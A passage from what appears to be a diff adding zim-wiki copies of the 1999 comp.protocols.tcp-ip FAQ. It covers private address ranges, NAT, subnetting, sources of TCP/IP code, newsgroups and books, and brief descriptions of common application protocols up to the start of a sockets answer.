UNREACHABLE" packets returned by the network. (Microsoft's
|
||||
TRACERT sends ICMP "ECHO" packets rather than UDP packets,
|
||||
and so receives ICMP "TIME-TO-LIVE EXCEEDED" or "ECHO
|
||||
RESPONSE" packets in return.)
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
TCP/IP Network Operations
|
||||
|
||||
1. How can I measure the performance of an IP link?
|
||||
|
||||
You can get a quick approximation by timing how long it takes to
|
||||
FTP or RCP a large file over the link, but bear in mind that that
|
||||
measurement will be skewed by the time spent in dealing with the
|
||||
local and remote filesystems, not simply with the network itself.
|
||||
And remember to measure the time it takes to receive a file, not
|
||||
the time it takes to send it; the sender can report completion
|
||||
even though large amounts of data are still buffered locally by
|
||||
TCP and have not yet been delivered to the destination.
|
||||
|
||||
Two well-known open-source programs that measure and report
|
||||
throughput over an IP link without involving the filesystem are:
|
||||
|
||||
o TTCP, available for anonymous ftp from the Silicon Graphics
|
||||
FTP archive at <ftp://ftp.sgi.com/sgi/src/ttcp/>.
|
||||
|
||||
o Rick Jones' NETPERF, available on the Web at
|
||||
<http://www.cup.hp.com/netperf/NetperfPage.html>.
|
||||
|
||||
If neither of those tools does what you want then you might find
|
||||
something that meets your needs in CAIDA's measurement tools list
|
||||
at <http://www.caida.org/Tools/meastools.html>.
|
||||
|
||||
2. What IP addresses should I assign to machines on a private
|
||||
internet?
|
||||
|
||||
You shouldn't use IP addresses that have been assigned to some
|
||||
other organisation, because if knowledge of your network ever gets
|
||||
leaked onto the Internet they may disrupt that innocent
|
||||
organisation's activity. RFC 1918 provides a solution for this
|
||||
problem by allocating several IP address ranges specifically for
|
||||
use on private networks. These addresses will never be assigned
|
||||
to any organisation and are never supposed to appear on the
|
||||
Internet. The ranges are:
|
||||
|
||||
Class A: 10.0.0.0 through 10.255.255.255
|
||||
Class B: 172.16.0.0 through 172.31.255.255
|
||||
Class C: 192.168.0.0 through 192.168.255.255
|
||||
|
||||
|
||||
3. Can I set up a gateway to the Internet that translates IP
|
||||
addresses, so that I don't have to change all our internal
|
||||
addresses to an official network?
|
||||
|
||||
This is called Network Address Translation, or NAT. In general it
|
||||
is a difficult thing to do properly because many applications
|
||||
embed IP addresses in the application-level data (FTP's "PORT"
|
||||
command is a notable example) so NAT isn't simply a matter of
|
||||
translating addresses in the IP header and recalculating header
|
||||
checksums. Also, if the network number(s) you're using match those
|
||||
assigned to another organisation, your gateway may not be able to
|
||||
communicate with that organisation. As noted above, RFC 1918
|
||||
proposes network numbers that are reserved for private use, to
|
||||
avoid such conflicts, but if you're already using a different
|
||||
network number this won't help you.
|
||||
|
||||
However, there are several products that do attempt to provide
|
||||
this kind of on-the-fly NAT. Linux provides NAT through its "IP
|
||||
Masquerading" feature, and many firewall and router vendors offer
|
||||
NAT capabilities in their products -- look for "Network Address
|
||||
Translation" in your favourite Web search engine to get a list of
|
||||
vendors. Proxy servers developed for firewalls can also sometimes
|
||||
be used as a substitute for an address-translating gateway for
|
||||
particular application protocols. This is discussed in more detail
|
||||
in the FAQ for the comp.security.firewalls newsgroup. That FAQ can
|
||||
be viewed on the Web at <http://www.clark.net/pub/mjr/pubs/fwfaq/>.
|
||||
|
||||
4. Can I use a single bit subnet?
|
||||
|
||||
The answer used to be a straightforward "no", because a 1-bit
|
||||
subnet can only have a subnet part of all-ones or all-zeroes, both
|
||||
of which were assigned special meanings when the subnetting
|
||||
concept was originally defined. (All-ones meant "broadcast, all
|
||||
subnets of this net" and all-zeroes meant "this subnet, regardless
|
||||
of its actual subnet number".)
|
||||
|
||||
However, the old definition of subnetting has been superseded by
|
||||
the concept of Classless Inter-Domain Routing (CIDR, pronounced
|
||||
'cider'). Under CIDR the subnet doesn't really have an existence
|
||||
of its own and the subnet mask simply provides the mechanism for
|
||||
isolating an arbitrarily-sized network portion of an IP address
|
||||
from the remaining host part. As CIDR-aware equipment is deployed
|
||||
it becomes increasingly like that you will be able to use a 1-bit
|
||||
subnet with at least some particular combinations of networking
|
||||
equipment. However, it's still not safe to assume that a 1-bit
|
||||
subnet will work properly with all kinds of equipment.
|
||||
|
||||
As Steinar Haug explains:
|
||||
|
||||
From RFC 1122:
|
||||
|
||||
> 3.3.6 Broadcasts
|
||||
>
|
||||
> Section 3.2.1.3 defined the four standard IP broadcast address
|
||||
> forms:
|
||||
> Limited Broadcast: {-1, -1}
|
||||
> Directed Broadcast: {<Network-number>, -1}
|
||||
> Subnet Directed Broadcast: {<Network-number>, <Subnet-number>, -1}
|
||||
> All-Subnets Directed Broadcast: {<Network-number>, -1, -1}
|
||||
|
||||
All-Subnets Directed broadcasts are being deprecated in favor of IP
|
||||
multicast, but were very much defined at the time RFC1122 was written.
|
||||
Thus a Subnet Directed Broadcast to a subnet of all ones is not
|
||||
distinguishable from an All-Subnets Directed Broadcast.
|
||||
|
||||
For those old systems that used all zeros for broadcast in IP
|
||||
addresses, a similar argument can be made against the subnet of all
|
||||
zeros.
|
||||
|
||||
Also, for old routing protocols like RIP, a route to subnet zero is not
|
||||
distinguishable from the route to the entire network number (except
|
||||
possibly by context).
|
||||
|
||||
Most of today's systems don't support variable length subnet masks
|
||||
(VLSM), and for such systems the above is true. However, all the major
|
||||
router vendors and *some* Unix systems (BSD 4.4 based ones) support
|
||||
VLSMs, and in that case the situation is more complicated :-)
|
||||
|
||||
With VLSMs (necessary to support CIDR, see RFC 1519), you can utilize
|
||||
the address space more efficiently. Routing lookups are based on
|
||||
*longest* match, and this means that you can for instance subnet the
|
||||
class C net with a mask of 255.255.255.224 (27 bits) in addition to the
|
||||
subnet mask of 255.255.255.192 (26 bits) given above. You will then be
|
||||
able to use the addresses x.x.x.33 through x.x.x.62 (first three bits
|
||||
001) and the addresses x.x.x.193 through x.x.x.222 (first three bits
|
||||
110) with this new subnet mask. And you can continue with a subnet mask
|
||||
of 28 bits, etc. (Note also, by the way, that non-contiguous subnet
|
||||
masks are deprecated.)
|
||||
|
||||
This is all very nicely covered in the paper by Havard Eidnes:
|
||||
|
||||
Practical Considerations for Network Address using a
|
||||
CIDR Block Allocation
|
||||
Proceedings of INET '93
|
||||
|
||||
This paper is available with anonymous FTP from
|
||||
aun.uninett.no:pub/misc/eidnes-cidr.ps.
|
||||
|
||||
The same paper, with minor revisions, is one of the articles in the
|
||||
special Internetworking issue of Communications of the ACM (last month,
|
||||
I believe).
|
||||
|
||||
Steinar Haug, SINTEF RUNIT, University of Trondheim, NORWAY
|
||||
Email: Steinar.Haug@runit.sintef.no
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
TCP/IP Protocol Implementations
|
||||
|
||||
1. Where can I find TCP/IP source code?
|
||||
|
||||
Code used in the venerable Net-2 version of Berkeley Unix is
|
||||
available by anonymous FTP from
|
||||
<ftp://ftp.uu.net/systems/unix/bsd-sources/sys/netinet> (at UUNet
|
||||
in Virginia, US) and
|
||||
<ftp://gatekeeper.dec.com/pub/BSD/net2/sys/> (at Compaq in
|
||||
California, US).
|
||||
|
||||
Source code for the TCP/IP implementations in the current dialects
|
||||
of BSD Unix is available. Instructions on how to access the
|
||||
sources through FTP and other methods is detailed on their
|
||||
respective websites: FreeBSD at <http://www.freebsd.org/>; NetBSD
|
||||
at <http://www.netbsd.org/>; and OpenBSD at
|
||||
<http://www.openbsd.org/>.
|
||||
|
||||
Source for the Unix-like Linux operating system is at
|
||||
<http://www.kernel.org/pub/linux/>.
|
||||
|
||||
Source for the TCP/IP implementation of the Xinu operating system
|
||||
discussed in Comer & D. L. Stevens' "Internetworking with TCP/IP
|
||||
Volume II" is at <ftp://ftp.cs.purdue.edu/pub/Xinu/>.
|
||||
|
||||
WATTCP is a DOS TCP/IP stack derived from the NCSA Telnet program
|
||||
and much enhanced. It is available from many DOS software archive
|
||||
sites as WATTCP.ZIP. This file includes some example programs and
|
||||
complete source code. The interface isn't BSD sockets but is well
|
||||
suited to PC type work.
|
||||
|
||||
KA9Q is Phil Karn's network operating system for PC's. It includes
|
||||
a TCP/IP implementation originally developed for use over packet
|
||||
radio. Source is available from Phil's website at
|
||||
<http://people.qualcomm.com/karn/code/ka9qos/>.
|
||||
|
||||
2. Where can I find TCP/IP application source code?
|
||||
|
||||
Source code for the various TCP/IP applications delivered with the
|
||||
current BSD Unix flavours is available through the FreeBSD, NetBSD
|
||||
and OpenBSD websites noted in the previous section.
|
||||
|
||||
Linux application source is at <http://www.kernel.org/pub/linux/>.
|
||||
Much of the application source used by Linux was originally
|
||||
developed by the GNU Project whose website is at
|
||||
<http://www.gnu.org/>.
|
||||
|
||||
Code from Comer & D. L. Stevens' "Internetworking with TCP/IP
|
||||
Volume III" is available by anonymous FTP from
|
||||
<ftp://ftp.cs.purdue.edu/pub/dls/>.
|
||||
|
||||
Code from W. R. Stevens' "TCP/IP Illustrated, Volume 1" is
|
||||
available from
|
||||
<ftp://ftp.uu.net/published/books/stevens.tcpipiv1.tar.Z>.
|
||||
|
||||
Source code for some well-known cross-system TCP/IP applications
|
||||
(BIND, sendmail, Apache and so on) is available from the various
|
||||
organisations that sponsor the applications. See Part 2 of the FAQ
|
||||
for details.
|
||||
|
||||
3. Where can I find IPv6 source code?
|
||||
|
||||
There are several freely distributable implementations of IPv6,
|
||||
particularly for BSD and Linux. You can find detailed information at
|
||||
<http://playground.sun.com/pub/ipng/html/ipng-implementations.html>,
|
||||
part of the IPv6 home site mentioned above.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
Further Sources of Information
|
||||
|
||||
1. TCP/IP-related newsgroups and FAQ lists
|
||||
|
||||
Collections of newsgroup FAQ documents are archived at many
|
||||
locations including <http://www.faqs.org/> and
|
||||
<ftp://rtfm.mit.edu/pub/faqs/>. The following newsgroups are
|
||||
particularly relevant to TCP/IP:
|
||||
|
||||
comp.protocols.tcp-ip covers all of the TCP/IP suite.
|
||||
|
||||
comp.protocols.dns.bind covers the BIND suite, which contains
|
||||
server and client implementations of DNS.
|
||||
|
||||
comp.protocols.tcp-ip.domains discusses DNS global
|
||||
administration and politics.
|
||||
|
||||
comp.protocols.nfs covers NFS protocol, implementation, and
|
||||
administration.
|
||||
|
||||
comp.protocols.snmp covers SNMP definition, implementation,
|
||||
and administration.
|
||||
|
||||
comp.protocols.time.ntp covers NTP definition,
|
||||
implementation, and administration.
|
||||
|
||||
comp.protocols.tcp-ip.ibmpc discusses TCP/IP for IBM(-like)
|
||||
personal computers. The group's FAQ is available at
|
||||
<ftp://ftp.netcom.com/pub/ma/mailcom/IBMTCP/>.
|
||||
|
||||
comp.os.ms-windows.networking.tcp-ip discusses TCP/IP on
|
||||
Microsoft Windows machines.
|
||||
|
||||
comp.os.ms-windows.programmer.tools.winsock covers the
|
||||
Winsock sockets API on Microsoft Windows machines. The
|
||||
group's FAQ is available at
|
||||
<http://www.cyberport.com/~tangent/programming/winsock/>.
|
||||
|
||||
comp.os.os2.networking.tcp-ip discusses TCP/IP on OS/2.
|
||||
|
||||
comp.dcom.lans.ethernet covers Ethernet and IEEE 802.3 LAN's.
|
||||
The group's FAQ is available at
|
||||
<ftp://dorm.rutgers.edu/pub/novell/info_and_docs/Ethernet.FAQ>.
|
||||
|
||||
comp.dcom.lans.fddi covers FDDI LAN's.
|
||||
|
||||
comp.dcom.lans.token-ring covers IBM Token Ring and IEEE
|
||||
802.5 LAN's.
|
||||
|
||||
comp.dcom.lans.misc covers all other types of LAN.
|
||||
|
||||
comp.protocols.ppp covers PPP and SLIP. The group's FAQ is
|
||||
available at <http://cs.uni-bonn.de/ppp/part1.html>.
|
||||
|
||||
comp.dcom.sys.cisco discusses cisco products.
|
||||
|
||||
comp.dcom.sys.wellfleet discusses Wellfleet (now Bay
|
||||
Networks) products.
|
||||
|
||||
2. Are there any good books on TCP/IP?
|
||||
|
||||
Yes, lots of them, far too many to list here. Uri Raz maintains a
|
||||
TCP/IP bibliography (the "TCP/IP Resources List") that is posted
|
||||
to the comp.protocols.tcp-ip newsgroup on a monthly basis. It is
|
||||
available on the Web at
|
||||
<http://www.qnx.com/%7Emphunter/tcpip_resources.html> and
|
||||
<http://www.faqs.org/faqs/internet/tcp-ip/resource-list/index.html>
|
||||
or can be retrieved by anonymous FTP from
|
||||
<ftp://rtfm.mit.edu/pub/usenet-by-hierarchy/comp/protocols/tcp-ip/>.
|
||||
|
||||
However, a couple of books that always head the list of
|
||||
recommended reading are:
|
||||
|
||||
"Internetworking with TCP/IP Volume I (Principles, Protocols,
|
||||
and Architecture)" by Douglas E. Comer, published by Prentice
|
||||
Hall, 1991 (ISBN 0-13-468505-9). This is an introductory book
|
||||
which covers all of the fundamental protocols, including IP,
|
||||
UDP, TCP, and the gateway protocols. It also discusses some
|
||||
higher level protocols such as FTP, Telnet, and NFS.
|
||||
|
||||
"TCP/IP Illustrated, Volume 1: The Protocols" by W. Richard
|
||||
Stevens, published by Addison-Wesley, 1994 (ISBN
|
||||
0-201-63346-9). This book explains the TCP/IP protocols and
|
||||
several application protocols in exquisite detail. It
|
||||
contains many real-life traces of the protocols in action,
|
||||
which is especially valuable for people who need to
|
||||
understand the protocols in depth.
|
||||
|
||||
If you're writing programs that use TCP/IP then the classic text
|
||||
is "Unix Network Programming" by W. Richard Stevens, published by
|
||||
Prentice Hall, 1990 (ISBN 0-13-949876-1). It's now being rewritten
|
||||
as a three volume set. The first volume "Unix Network Programming:
|
||||
Networking APIs: Sockets and Xti" published by Prentice Hall, 1997
|
||||
(ISBN 013490012X), contains just about everything you need to know
|
||||
about using TCP/IP and includes material on topics (eg IPv6,
|
||||
multicasting, threads) that are not covered in the original UNP.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
This compilation contains the opinions of the FAQ maintainer and the
|
||||
various FAQ contributors. Any resemblance to the opinions of the FAQ
|
||||
maintainer's employer is entirely coincidental.
|
||||
|
||||
Copyright (C) Mike Oliver 1997-1999. All Rights Reserved.
|
||||
@@ -0,0 +1,491 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-07T13:36:12+08:00
|
||||
|
||||
====== Frequently Asked Questions (1999-09) Part 2 of 2 ======
|
||||
Created 星期二 07 六月 2011
|
||||
From: tcp-ip-faq@eng.sun.com (TCP/IP FAQ Maintainer)
|
||||
Newsgroups: comp.protocols.tcp-ip
|
||||
Subject: TCP/IP FAQ; Frequently Asked Questions (1999-09) Part 2 of 2
|
||||
Date: 7 Sep 1999 03:38:45 GMT
|
||||
Message-ID: <tcp-ip-faq-2.1999-09@eng.sun.com>
|
||||
Summary: Part 2 of a 2-part informational posting that contains
|
||||
responses to common questions on basic TCP/IP network
|
||||
protocols and applications.
|
||||
X-Disclaimer: Approval for postings in *.answers is based on form, not content.
|
||||
|
||||
Archive-name: internet/tcp-ip/tcp-ip-faq/part2
|
||||
Version: 5.15
|
||||
Last-modified: 1999-09-06 20:11:43
|
||||
Posting-Frequency: monthly (first Friday)
|
||||
Maintainer: tcp-ip-faq@eng.sun.com (Mike Oliver)
|
||||
URL: http://www.itprc.com/tcpipfaq/default.htm
|
||||
|
||||
TCP/IP Frequently Asked Questions
|
||||
|
||||
Part 2: Applications and Application Programming
|
||||
|
||||
This is Part 2 of the Frequently Asked Questions (FAQ) list for the
|
||||
comp.protocols.tcp-ip Usenet newsgroup. The FAQ provides answers to a
|
||||
selection of common questions on the various protocols (IP, TCP, UDP,
|
||||
ICMP and others) that make up the TCP/IP protocol suite. It is posted
|
||||
to the news.answers, comp.answers and comp.protocols.tcp-ip newsgroups
|
||||
on or about the first Friday of every month.
|
||||
|
||||
The FAQ is posted in two parts. Part 1 contains answers to general
|
||||
questions and questions that concern the fundamental components of the
|
||||
suite. Part 2 contains answers to questions concerning common
|
||||
applications that depend on the TCP/IP suite for their network
|
||||
connectivity.
|
||||
|
||||
Comments on this document can be emailed to the FAQ maintainer at
|
||||
<tcp-ip-faq@eng.sun.com>.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
Table of Contents
|
||||
|
||||
FAQ Part 2 -- Applications and Application Programming
|
||||
|
||||
What Are The Common TCP/IP Application Protocols?
|
||||
|
||||
1. DHCP
|
||||
2. DNS
|
||||
3. FTP
|
||||
4. HTTP
|
||||
5. IMAP
|
||||
6. NFS
|
||||
7. NNTP
|
||||
8. NTP
|
||||
9. POP
|
||||
10. Rlogin
|
||||
11. Rsh
|
||||
12. SMTP
|
||||
13. SNMP
|
||||
14. Ssh
|
||||
15. Telnet
|
||||
16. X Window System
|
||||
|
||||
TCP/IP Programming
|
||||
|
||||
1. What are sockets?
|
||||
2. How can I detect that the other end of a TCP connection has
|
||||
crashed?
|
||||
3. Can TCP keepalive timeouts be configured?
|
||||
4. Are there object-oriented network programming tools?
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
What Are The Common TCP/IP Application Protocols?
|
||||
|
||||
1. DHCP
|
||||
|
||||
Dynamic Host Configuration Protocol (DHCP) allows IP addresses to
|
||||
be allocated to hosts on an as-needed basis. The conventional
|
||||
scheme of allocating a permanent fixed IP address to every host is
|
||||
wasteful of addresses in situations where only a relatively small
|
||||
number of hosts are active at any given time. DHCP lets a host
|
||||
'borrow' an IP address from a pool of IP addresses; when the
|
||||
address is no longer needed it is recycled and made available for
|
||||
use by some other host. DHCP also allows a host to retrieve a
|
||||
variety of configuration information at the same time as it
|
||||
acquires an IP address.
|
||||
|
||||
DCHP depends on UDP to carry packets between the client and server
|
||||
tasks.
|
||||
|
||||
DHCP is defined by RFC's 2131 and 2132. A widely-used
|
||||
implementation of DHCP can be downloaded from
|
||||
<http://www.isc.org/dhcp.html>.
|
||||
|
||||
2. DNS
|
||||
|
||||
The Domain Name System (DNS) provides dynamic on-demand
|
||||
translation between human-readable names (like www.pizzahut.com)
|
||||
and the numeric addresses actually used by IP (like
|
||||
192.112.170.243). The basics of DNS operation are defined in RFC's
|
||||
1034, 1101, 1876, 1982 and 2065.
|
||||
|
||||
DNS uses both UDP and TCP. It used UDP to carry simple queries and
|
||||
responses but depends on TCP to guarantee the correct and orderly
|
||||
delivery of large amounts of bulk data (eg transfers of entire
|
||||
zone configurations) across the network.
|
||||
|
||||
DNS standards are discussed in the comp.protocols.dns.std
|
||||
newsgroup. A very widely-used implementation of DNS called BIND
|
||||
(Berkeley Internet Name Domain) is discussed in the
|
||||
comp.protocols.dns.bind newsgroup, and the BIND software itself
|
||||
can be downloaded from <http://www.isc.org/bind.html>. The
|
||||
operation and politics of DNS are discussed in the
|
||||
comp.protocols.tcp-ip.domains newsgroup.
|
||||
|
||||
3. FTP
|
||||
|
||||
File Transfer Protocol (FTP) provides a mechanism for moving data
|
||||
files between systems. In addition to the fundamental PUT and GET
|
||||
operations, FTP provides a small number of file management and
|
||||
user authentication facilities. The protocol is defined in RFC
|
||||
959.
|
||||
|
||||
FTP depends on TCP to guarantee the correct and orderly delivery
|
||||
of data across the network.
|
||||
|
||||
4. HTTP
|
||||
|
||||
Hyper Text Transfer Protocol (HTTP) is the protocol used to move
|
||||
Web pages across an internet. Version 1.0 of HTTP is defined by
|
||||
RFC 1945. Version 1.1 makes more efficient use of TCP and is
|
||||
defined by RFC 2068.
|
||||
|
||||
HTTP depends on TCP to guarantee the correct and orderly delivery
|
||||
of data across the network.
|
||||
|
||||
5. IMAP
|
||||
|
||||
Interactive Mail Access Protocol (IMAP) allows clients to
|
||||
manipulate email messages and mailboxes that reside on some server
|
||||
machine. The current version of IMAP is Version 4, usually
|
||||
referred to as IMAP4. IMAP4 is described by RFC 2060. IMAP
|
||||
provides no way of sending email; client programs that use IMAP to
|
||||
read mail usually use SMTP to send messages. IMAP is more powerful
|
||||
and more complex than the other widely-used mail-reading protocol
|
||||
POP.
|
||||
|
||||
IMAP depends on TCP to guarantee the correct and orderly delivery
|
||||
of data across the network.
|
||||
|
||||
IMAP is discussed in the comp.mail.imap newsgroup.
|
||||
|
||||
6. NFS
|
||||
|
||||
Network File System (NFS) allows files stored on one machine (the
|
||||
"server") to be accessed by other machines (the "clients") as
|
||||
though the files were actually present on the client systems. NFS
|
||||
is defined in terms of a Remote Procedure Call (RPC) abstraction
|
||||
which in turn formats its packets according to a
|
||||
processor-independent eXternal Data Representation (XDR).
|
||||
|
||||
Version 2 of NFS is defined in RFC 1094 and Version 3 is defined
|
||||
in RFC 1813. The RPC mechanism most often used with NFS, ONC/RPC,
|
||||
is defined by RFC 1831. The XDR conventions used by ONC/RPC are
|
||||
defined by RFC 1832. The ONC/RPC binding mechanism (a minimal
|
||||
directory service which allows RPC clients to rendezvous with RPC
|
||||
servers) is defined by RFC 1833.
|
||||
|
||||
NFS can run over any kind of transport, but is most often used
|
||||
over UDP. UDP does not guarantee packet delivery or ordering, so
|
||||
when NFS runs over UDP the RPC implementation must provide its own
|
||||
guarantees of correctness. When NFS runs over TCP, the RPC layer
|
||||
can depend on TCP to provide this kind of correctness.
|
||||
|
||||
NFS is discussed in the comp.protocols.nfs newsgroup.
|
||||
|
||||
7. NNTP
|
||||
|
||||
Network News Transfer Protocol (NNTP) is used to propagate netnews
|
||||
postings (including Usenet postings) between systems. It is
|
||||
defined in RFC 977. (The format of netnews messages is defined in
|
||||
RFC 1036.)
|
||||
|
||||
NNTP depends on TCP to guarantee the correct and orderly delivery
|
||||
of data across the network.
|
||||
|
||||
NNTP is discussed in the news.software.nntp newsgroup. A very
|
||||
widely-used implementation of NNTP called INN (InterNet News) can
|
||||
be downloaded from <http://www.isc.org/inn.html>.
|
||||
|
||||
8. NTP
|
||||
|
||||
Network Time Protocol (NTP) is used to synchronise time-of-day
|
||||
clocks between various computer systems. The current version of
|
||||
NTP is Version 3, defined in RFC 1305. Earlier versions (2 and 1
|
||||
respectively) of the protocol are defined in RFC's 1119 and 1059.
|
||||
David Mills maintains a publically-available implementation of NTP
|
||||
server and clients along with a comprehensive collection of NTP
|
||||
documentation on the web at <http://www.eecis.udel.edu/%7Entp/>.
|
||||
|
||||
NTP depends on UDP to carry packets between server and client
|
||||
tasks.
|
||||
|
||||
NTP is discussed in the comp.protocols.time.ntp newsgroup.
|
||||
|
||||
9. POP
|
||||
|
||||
Post Office Protocol (POP) allows clients to read and remove email
|
||||
from a mailbox that resides on some server machine. The current
|
||||
version of POP is Version 3, usually referred to as POP3. It is
|
||||
described by RFC 1939. POP provides no way of sending email;
|
||||
client programs that use POP to read mail usually use SMTP to send
|
||||
messages. POP is simpler and less powerful than the other
|
||||
widely-used mail-reading protocol IMAP.
|
||||
|
||||
POP depends on TCP to guarantee the correct and orderly delivery
|
||||
of data across the network.
|
||||
|
||||
POP doesn't have its own dedicated newsgroup. It is sometimes
|
||||
discussed in client-specific newsgroups in the comp.mail.*
|
||||
hierarchy.
|
||||
|
||||
10. Rlogin
|
||||
|
||||
Remote Login (rlogin) provides a network terminal or "remote
|
||||
login" capability. Rlogin is similar to Telnet but it adds a
|
||||
couple of features that make it a little more convenient than
|
||||
Telnet.
|
||||
|
||||
Rlogin is one of the so-called Berkeley r-commands, (where the "r"
|
||||
stands for "remote") a family of commands created at UC Berkeley
|
||||
during the development of BSD Unix to provide access to remote
|
||||
systems in ways that are more convenient than the original TCP/IP
|
||||
commands.
|
||||
|
||||
The most obvious convenience is that rlogin, like other
|
||||
r-commands, examines a .rhosts (pronounced "dot ar hosts") file on
|
||||
the server side to authenticate logins based on the client host
|
||||
address. The .rhosts file can be constructed to allow remote
|
||||
access without requiring you to enter a password. If used
|
||||
improperly this feature can be a security threat, but if used
|
||||
correctly it can actually enhance security by not requiring a
|
||||
password to be sent over the network where it might be read by a
|
||||
packet sniffer.
|
||||
|
||||
The r-commands depend on TCP to guarantee the correct and orderly
|
||||
delivery of data across the network.
|
||||
|
||||
11. Rsh
|
||||
|
||||
Remote Shell (rsh) is an r-command that provides for remote
|
||||
execution of arbitrary commands. It allows you to run a command on
|
||||
a server without having to actually log in on the server. More
|
||||
importantly it allows you to feed data to the remote command and
|
||||
retrieve the command's output without having to stage the data
|
||||
through temporary files on the server.
|
||||
|
||||
Like other Berkeley r-commands, rsh uses the .rhosts file on the
|
||||
server side to authenticate access based on the client's host
|
||||
address.
|
||||
|
||||
On some non-BSD systems the Remote Shell command is named remsh
|
||||
because by the time the command was delivered on those systems the
|
||||
usual rsh name had been used for a "restricted shell" application,
|
||||
a command line interpreter intended to boost security by
|
||||
preventing its users from performing certain activities.
|
||||
|
||||
On Unix systems most of the work of rsh is handled by the rcmd(3)
|
||||
library function, so if you're writing a program that needs
|
||||
rsh-like functionality then you might be able to use that
|
||||
function. However, since the rsh protocol requires the client to
|
||||
use a privileged port you'll only be able to use rcmd(3) if your
|
||||
program executes with superuser privileges. That's why the rsh
|
||||
executable is setuid-root on Unix machines.
|
||||
|
||||
If your program will not run as root then you might be able to use
|
||||
the rexec(3) function instead. rexec(3) does not use the
|
||||
server-side .rhosts file. Instead it requires the client to supply
|
||||
an account password which is then transmitted unencrypted over the
|
||||
network.
|
||||
|
||||
12. SMTP
|
||||
|
||||
Simple Mail Transfer Protocol (SMTP) is used to deliver email from
|
||||
one system to another. The basic SMTP is defined in RFC 821 and
|
||||
the format of Internet mail messages is described in RFC 822.
|
||||
|
||||
SMTP depends on TCP to guarantee the correct and orderly delivery
|
||||
of data across the network.
|
||||
|
||||
A very widely-used implementation of SMTP called sendmail can be
|
||||
downloaded from <http://www.sendmail.org/>. Other open-source SMTP
|
||||
implementations include qmail (available at
|
||||
<http://www.qmail.org/>) postfix (available at
|
||||
<http://www.postfix.org/>), smail (available at
|
||||
<ftp://ftp.planix.com/pub/Smail/>), exim (available at
|
||||
<http://www.exim.org/>) and smtpd (available at
|
||||
<http://www.obtuse.com/smtpd.html>).
|
||||
|
||||
13. SNMP
|
||||
|
||||
Simple Network Management Protocol (SNMP) provides a means of
|
||||
monitoring and managing systems over a network. SNMP defines a
|
||||
method of sending queries (the GET and GET-NEXT primitives) and
|
||||
commands (the SET primitive) from a management station client to
|
||||
an agent server running on the target system, and collecting
|
||||
responses and unsolicited event notifications (the TRAP
|
||||
primitive).
|
||||
|
||||
Version 1 of SNMP is defined by RFC's 1098 and 1157. SNMP Version
|
||||
2 is defined by RFC's 1441, 1445, 1446, 1447 and 1901 through
|
||||
1909. The various things that can be monitored and managed by
|
||||
SNMP, collectively called the Management Information Base (MIB)
|
||||
are defined in dozens of additional RFC's.
|
||||
|
||||
SNMP sends traffic through UDP because of its relative simplicity
|
||||
and low overhead.
|
||||
|
||||
SNMP is discussed in the comp.protocols.snmp newsgroup.
|
||||
|
||||
14. Ssh
|
||||
|
||||
Secure Shell (ssh) provides remote login and execution features
|
||||
similar to those of the rsh and rlogin r-commands, but ssh
|
||||
encrypts the data that is exchanged over the network. Encryption
|
||||
can protect sensitive information, and it is not uncommon for
|
||||
security-conscious administrators to disable plain rsh and telnet
|
||||
services in favour of ssh.
|
||||
|
||||
The SSH protocol used by the ssh command has also been used to
|
||||
build a secure file transfer application which can be used as an
|
||||
alternative to FTP for sensitive data.
|
||||
|
||||
Complete information on ssh and its SSH protocol can be found at
|
||||
<http://www.ssh.fi/>.
|
||||
|
||||
15. Telnet
|
||||
|
||||
Telnet provides a network terminal or "remote login" capability.
|
||||
The Telnet server accepts data from the telnet client and forwards
|
||||
them to the operating system in such a way that the received
|
||||
characters are treated as though they had been typed at a terminal
|
||||
keyboard. Responses generated by the server operating system are
|
||||
passed back to the Telnet client for display.
|
||||
|
||||
The Telnet protocol provides the ability to negotiate many kinds
|
||||
of terminal-related behaviour (local vs. remote echoing, line mode
|
||||
vs. character mode and others) between the client and server. The
|
||||
basic Telnet protocol is defined in RFC's 818 and 854 and the
|
||||
option negotiation mechanism is described in RFC 855.
|
||||
|
||||
Specific Telnet options, implementation issues and protocol quirks
|
||||
are discussed in several dozen RFC's dating back to 1971. (That's
|
||||
RFC's 97, 137, 139, 206, 215, 216, 318, 328, 340, 393, 435, 466,
|
||||
495, 513, 559, 560, 562, 563, 581, 587, 595, 596, 652, 653, 654,
|
||||
655, 656, 657, 658, 698, 726, 727, 728, 732, 735, 736, 748, 749,
|
||||
779, 856, 857, 858, 859, 860, 861, 885, 927, 933, 946, 1041, 1043,
|
||||
1053, 1073, 1079, 1091, 1096, 1097, 1143, 1184, 1205, 1372, 1408,
|
||||
1411, 1412, 1416, 1571, 1572 and 2066, and that's not counting
|
||||
obsolete ones. A couple of these are not entirely serious.) As you
|
||||
might infer from this pedigree, Telnet is a widely-deployed and
|
||||
well-used protocol.
|
||||
|
||||
Telnet depends on TCP to guarantee the correct and orderly
|
||||
delivery of data between the client and server.
|
||||
|
||||
16. X Window System
|
||||
|
||||
The X Window System (X11R6 is the most recent incarnation) allows
|
||||
client programs running on one machine to control the graphic
|
||||
display, keyboard and mouse of some other machine or of a
|
||||
dedicated X display terminal.
|
||||
|
||||
X depends on TCP to guarantee the correct and orderly delivery of
|
||||
data across the network.
|
||||
|
||||
The X Window System is discussed in the comp.windows.x newsgroup.
|
||||
|
||||
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
||||
|
||||
TCP/IP Programming
|
||||
|
||||
1. What are sockets?
|
||||
|
||||
A socket is an abstraction that represents an endpoint of
|
||||
communication. Most applications that consciously use TCP and UDP
|
||||
do so by creating a socket of the appropriate type and then
|
||||
performing a series of operations on that socket. The operations
|
||||
that can be performed on a socket include control operations (such
|
||||
as associating a port number with the socket, initiating or
|
||||
accepting a connection on the socket, or destroying the socket)
|
||||
data transfer operations (such as writing data through the socket
|
||||
to some other application, or reading data from some other
|
